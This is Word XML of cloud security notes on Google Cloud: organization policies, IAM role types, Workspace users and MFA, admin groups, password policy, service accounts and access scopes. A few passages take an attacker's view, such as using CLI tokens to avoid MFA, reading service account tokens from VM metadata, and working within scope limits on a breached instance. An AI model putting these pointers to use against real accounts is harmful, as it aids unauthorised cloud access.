        <w:t xml:space="preserve"> Prevents the accidental deletion of Shared VPC host projects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C531B" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Sets the internal DNS setting for new projects to Zonal DNS Only:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents the use of a legacy DNS setting that has reduced service availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CACF2F3" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Skip default network creation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents automatic creation of the default VPC network and related resources. This avoids </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>overly-permissive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> default firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F11A56" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Disable VPC External IPv6 usage:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevents the creation of external IPv6 subnets, which can be exposed to unauthorized internet access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1384E008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</w:pPr>
    </w:p>
    <w:p w14:paraId="0D86DDB0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</w:pPr>
    </w:p>
    <w:p w14:paraId="5A6086D5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</w:pPr>
    </w:p>
    <w:p w14:paraId="098C28B7" w14:textId="09F36B1A" w:rsidR="00CB50AA" w:rsidRP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CB50AA">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>IAM Roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6102B54B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These are like IAM policies in AWS as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each role contains a set of permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1DCA8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However, unlike in AWS, there is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no centralized repo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of roles. Instead of that,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resources give X access roles to Y principals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the only way to find out who has access to a resource is to use the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get-</w:t>
      </w:r>
      <w:proofErr w:type="spell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iam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>-policy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method over that resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. This could be a problem because this means that the only way to find out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which permissions a principal has is to ask every resource who is it giving permissions to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, and a user might not have permissions to get permissions from all resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAAEDC7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There are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three types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of roles in IAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0470AF7B" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Basic/Primitive roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, which include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Owner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Editor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, and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Viewer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> roles that existed prior to the introduction of IAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208C065" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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lastRenderedPageBreak/>
        <w:t>Predefined roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you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see all of them with the privileges they have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:anchor="predefined_roles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here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54C9E42B" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA" w:rsidP="00CB50AA">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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Custom roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, which provide granular access according to a user-specified list of permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60431AAA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There are thousands of permissions in GCP. In order to check if a role has a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can </w:t>
      </w:r>
      <w:hyperlink r:id="rId37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search the permission here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see which roles have it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962CBD2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also </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:anchor="product_specific_documentation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search here predefined roles</w:t>
        </w:r>
      </w:hyperlink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offered by each product.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note that some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roles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> cannot be attached to users and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only to SAs because some permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> they contain. Moreover, note that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permissions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> will only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take effect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> if they are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attached to the relevant service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E31E585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Or check if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custom role can use a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId39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specific permission in here</w:t>
        </w:r>
      </w:hyperlink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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F459CDB" w14:textId="77777777" w:rsidR="00CB50AA" w:rsidRDefault="00CB50AA"/>
    <w:p w14:paraId="66DE410C" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r>
          <w:rPr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br/>
        </w:r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 - IAM, Principals &amp; Org Policies Enum</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="777250FB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Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799B566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GCP console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> there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isn't any Users or Groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> management, that is done in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Google Workspace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. Although you could synchronize a different identity provider in Google Workspace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED112F2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access Workspaces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users and groups in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId41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https://admin.google.com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15D0C8B9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MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be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forced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Workspaces </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>users,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> however, 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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> could use a token to access GCP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via cli which won't be protected by MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (it will be protected by MFA only when the user logins to generate it: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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gcloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> auth login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B12FE3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Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7986C04C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When an organisation is created several groups are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strongly suggested to be created.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you manage any of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>them</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you might have compromised all or an important part of the organization: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8406"/>
      </w:tblGrid>
      <w:tr w:rsidR="003E0641" w14:paraId="40A9FD84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8C2396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rPr>
                <w:rStyle w:val="Strong"/>
                <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
              </w:rPr>
              <w:t>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3E14A0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rPr>
                <w:rStyle w:val="Strong"/>
                <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="449313D9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6F7E0E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lastRenderedPageBreak/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-organization-admins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(group or individual accounts required for checklist)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43B567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 xml:space="preserve">Administering any resource that belongs to the organization. Assign this role sparingly; org admins have access to </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>all of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> your Google Cloud resources. Alternatively, because this function is highly privileged, consider using individual accounts instead of creating a group.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="3F9E18D8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6D4718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-network-admins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(required for checklist)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4D46B3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Creating networks, subnets, firewall rules, and network devices such as Cloud Router, Cloud VPN, and cloud load balancers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="4D2EBC76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2BEBD0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-billing-admins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(required for checklist)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026021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Setting up billing accounts and monitoring their usage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="3A3DC3C1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00D8FB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-developers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(required for checklist)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90CE0E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Designing, coding, and testing applications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="1220B23E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8BA6B1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-security-admins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86BD7F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 xml:space="preserve">Establishing and managing security policies for the entire organization, including access management and </w:t>
            </w:r>
            <w:hyperlink r:id="rId42" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
                </w:rPr>
                <w:t>organization constraint policies</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">. See the </w:t>
            </w:r>
            <w:hyperlink r:id="rId43" w:anchor="users_and_groups" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
                </w:rPr>
                <w:t>Google Cloud security foundations guide</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> for more information about planning your Google Cloud security infrastructure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="0FEBD6A0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62A6CE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gcp-devops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A5DBBD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Creating or managing end-to-end pipelines that support continuous integration and delivery, monitoring, and system provisioning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="04AD4E81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95805B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-logging-admins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6A00CC" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="37080FA9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A96DC7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-logging-viewers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E526A4" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="4EDC0646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4D9512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-monitor-admins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5CA2BC" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="17286B7F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E98E8F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-billing-viewer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(no longer by default)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0EE9B4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Monitoring the spend on projects. Typical members are part of the finance team.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="13D96A49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B09718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-platform-viewer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(no longer by default)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A130CA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Reviewing resource information across the Google Cloud organization.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="0F561BC1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CF2F24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-security-reviewer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(no longer by default)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502988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Reviewing cloud security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="2E1748BE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736A51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-network-viewer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(no longer by default)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C28FE6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Reviewing network configurations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="4499A555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4E60DD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grp-</w:t>
            </w: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-audit-viewer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(no longer by default)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E6CED6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Viewing audit logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="7AD74F10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68938E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</w:t>
            </w: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scc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-admin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(no longer by default)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F19B15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 xml:space="preserve">Administering Security Command </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Center</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0641" w14:paraId="58FFC54E" w14:textId="77777777" w:rsidTr="003E06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01223B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proofErr w:type="spellStart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gcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
              </w:rPr>
              <w:t>-secrets-admin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
              </w:rPr>
              <w:t>(no longer by default)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8B105F" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
            <w:pPr>
              <w:pStyle w:val="mx-auto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</w:pPr>
            <w:r>
              <w:t>Managing secrets in Secret Manager.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67413566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Default Password Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAA71C1" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Enforce strong </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64DAE1F0" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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Between 8 and 100 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A9273" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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 reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62710C95" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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 expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCA2EC" w14:textId="77777777" w:rsidR="003E0641" w:rsidRDefault="003E0641" w:rsidP="003E0641">
      <w:pPr>
        <w:pStyle w:val="max-w-3xl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people </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> accessing Workspace through a third party provider, these requirements aren't applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6802F5B3" w14:textId="6BD1BDE8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4BFB0C5E" wp14:editId="7E6B0CA9">
            <wp:extent cx="5731510" cy="1576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B62F" w14:textId="02B64E1D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7916483D" wp14:editId="6965D557">
            <wp:extent cx="5050155" cy="6075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00F8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Service accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593BE00A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These are the principals that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resources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">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have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attached</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and access to interact easily with GCP. For example, it's possible to access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auth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lastRenderedPageBreak/>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a Service Account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attached to a VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the metadata. It is possible to encounter some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conflicts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> when using both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IAM and access scopes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. For example, your service account may have the IAM role of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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compute.instanceAdmin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but the instance you've breached has been crippled with the scope limitation of </w:t>
      </w:r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https://www.googleapis.com/auth/compute.readonly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690ED771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It's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>similar to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IAM roles from AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. But not like in AWS,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any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> service account can be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attached to any service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (it doesn't need to allow it via a policy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C005C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Several of the service accounts that you will find are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">actually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automatically</w:t>
      </w:r>
      <w:proofErr w:type="gram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generated by GCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you start using a service, like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F56C25B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7E6AFD7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PROJECT_NUMBER-compute@developer.gserviceaccount.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B9BD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PROJECT_ID@appspot.gserviceaccount.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE69BFD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However, it's also possible to create and attach to resources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custom service accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, which will look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB0FAD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629546B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SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7101C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Access scopes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1C109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Access scope are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attached to generated OAuth tokens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
